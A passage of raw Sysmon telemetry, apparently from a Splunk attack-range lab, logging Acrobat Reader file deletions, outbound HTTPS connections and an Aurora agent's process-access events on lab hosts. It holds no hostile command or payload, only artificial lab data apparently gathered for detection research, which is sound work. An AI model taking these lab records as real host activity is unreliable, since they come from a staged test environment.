DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000047185Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:13.616{FE4C2B44-E64A-63C7-8706-00000000AF02}1400ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\SOPHIA.jsonMD5=48D789E76A242800BD7FA46DEE90346C,SHA256=4B462A9A780B69C03AC5CE15B84E59622A11C9507688515D2E1B6E0E195A8040,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047184Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:13.616{FE4C2B44-E64A-63C7-8706-00000000AF02}1400ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\SOPHIA.jsonMD5=2D73CE5426B388199070D4B2839C96CC,SHA256=BC79AD95B8B939D7D07F2115683379D0810BC99ACCCBEB8AD8D5290DD3DD14F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047183Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:13.616{FE4C2B44-E64A-63C7-8706-00000000AF02}1400ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\SOPHIA.jsonMD5=6F1CA6EAD3E5D346A0F09A801A04F0D7,SHA256=DEEBD57D8FCD559C888DB372B6395270EBDAEB76CE67B95A4A18CA5CBC029679,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047182Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:13.616{FE4C2B44-E64A-63C7-8706-00000000AF02}1400ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\SOPHIA.jsonMD5=97BBCA358F1EB1D1BDC3F020F6AC0577,SHA256=C05980B2959FC4B0E4B8651A614D687BCAE4A91C3F04EC0BF6640290FEC002A7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047181Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:13.616{FE4C2B44-E64A-63C7-8706-00000000AF02}1400ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\SOPHIA.jsonMD5=C1CC8F3DC2432E8956D7F57ED940D095,SHA256=F34E66A10713507476BAA63AC0E2BFDC97E86B4F46C39E5A4F71B729725633DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047180Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:13.616{FE4C2B44-E64A-63C7-8706-00000000AF02}1400ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\SOPHIA.jsonMD5=E8DFCDE965428BFCDF8CD6044BCBA11C,SHA256=4550991CFCF7C1F9621ACCCE85DC42F1442E8C4E7319F639C33A3F9C158DBB51,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047179Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:13.616{FE4C2B44-E64A-63C7-8706-00000000AF02}1400ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\SOPHIA.jsonMD5=970A821926672954C970491C542AB2AC,SHA256=F527AEC3797D8BB4889F4DF264ADF8CA19A6F9FD8BFD8CF1AF22A183B92732DC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047178Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:13.600{FE4C2B44-E64A-63C7-8706-00000000AF02}1400ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\SOPHIA.jsonMD5=7747CAFDD9D8E993BF6C6278BA8EB147,SHA256=5A6E0F1039902A5913CCD14F34865DAF3C62E85D9328A98BFAC156CDB2190C24,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047177Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:13.600{FE4C2B44-E64A-63C7-8706-00000000AF02}1400ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\SOPHIA.jsonMD5=611779762C56C1C05A210F9142E63937,SHA256=CEFD0316F110C4A410B8BB577D92722CB9AD24D4D4DB59DE531264BABF64EBB1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047176Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:13.600{FE4C2B44-E64A-63C7-8706-00000000AF02}1400ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\SOPHIA.jsonMD5=70EEFEF844F17011C91E32D859AB8A08,SHA256=D892D2AB8A1F4EE0586FE40ECF6062751EB972F93D92F9F717A16BF9A633B24E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047175Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:13.600{FE4C2B44-E64A-63C7-8706-00000000AF02}1400ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\SOPHIA.jsonMD5=66E57726F45828CC3CF561588B5B72F2,SHA256=D306E497D7D976FD09FF1EBA71DFD2EDAF8A97D3743FC7C2B1A932B7D14E437F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047174Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:13.600{FE4C2B44-E64A-63C7-8706-00000000AF02}1400ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\SOPHIA.jsonMD5=01860761BF352DF914370D7B5FD9A5EB,SHA256=6F8753A917B3C7BC12FE56FCFD534260357B0BBC8439CEE22F436711573FE873,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047173Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:13.600{FE4C2B44-E64A-63C7-8706-00000000AF02}1400ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\SOPHIA.jsonMD5=A19B7D9F317CCAEB9BA781A909F18F93,SHA256=36143D6701E6A00F612E4992B452D8997D48D5522F273544750E0686C92A2B8B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047172Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:13.585{FE4C2B44-E64A-63C7-8706-00000000AF02}1400ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\SOPHIA.jsonMD5=939CFB11612AF93BD6D61CA7458B23E1,SHA256=9A683EF625414C6791A4518209D9BCC4CEFCCAAABD94C1B7D3806010FF4CFAA4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047171Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:13.204{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA1E7D4F3FEC5C89BDF6D82E902F39D3,SHA256=9A402E8D8FA7A2BCB6206D1E571499E7A133E793B9BF91C35A60B837D11735F9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018722Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:14.447{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6613D4972B9DE7F5F937AAB9D9D6D08,SHA256=FE41F9188C0459768A2DCD4AE92737121D178B56BABC31BC22E8C4F7E4F2B3F6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000047228Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.903{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 354300x800000000000000047227Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:12.877{FE4C2B44-E652-63C7-8C06-00000000AF02}7044C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56476-false34.193.227.236ec2-34-193-227-236.compute-1.amazonaws.com443https 354300x800000000000000047226Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:12.862{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local57437- 354300x800000000000000047225Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.716{FE4C2B44-E652-63C7-8C06-00000000AF02}7044C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56475-false23.45.144.156a23-45-144-156.deploy.static.akamaitechnologies.com443https 10341000x800000000000000047224Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.875{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047223Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.870{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047222Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.868{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E606-63C7-7F06-00000000AF02}7140C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047221Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.859{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047220Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.853{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047219Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.851{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047218Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.850{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047217Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.849{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047216Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.842{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047215Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.825{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047214Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.805{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\NPSMDesktopProvider.dll+1be4a|C:\Windows\System32\NPSMDesktopProvider.dll+1226e|C:\Windows\System32\NPSMDesktopProvider.dll+12835|C:\Windows\System32\NPSMDesktopProvider.dll+67dc|C:\Windows\System32\TwinUI.dll+7bfb8|C:\Windows\System32\TwinUI.dll+7559d|C:\Windows\System32\TwinUI.dll+75173|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047213Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.801{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047212Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.801{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047211Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.800{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047210Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.797{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8ab30|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047209Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.797{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+1078f0|C:\Windows\System32\SHELL32.dll+8aaec|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047208Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.795{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047207Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:14.795{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files 